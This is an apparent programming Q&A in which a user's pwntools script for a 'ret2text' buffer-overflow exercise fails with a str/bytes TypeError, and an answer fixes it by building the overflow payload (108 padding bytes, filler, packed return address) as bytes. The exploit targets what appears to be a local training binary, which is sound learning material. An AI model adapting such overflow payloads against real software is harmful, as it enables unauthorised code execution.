# I am writing an exploit in PWN tools but i am getting this error "TypeError: can only concatenate str (not "bytes") to str"

Tags: python, binary, pwntools

I am trying to run the following exploit but i am getting the error mentioned above.

```
#!/usr/bin/env python

from pwn import *

sh = process('./ret2text')
target = 0x804863a
sh.sendline('A' * 108 + "junk" + p32(target))
sh.interactive()
```

I expected this to run correctly but i am getting the error in sh.sendline

Answer (score 0):

The argument to `sh.sendline()` must be a byte string, not a text string. `p32()` returns a byte string, but you're trying to concatenate text strings to it. Make them byte strings as well.

```
sh.sendline(b'A' * 108 + b"junk" + p32(target))
```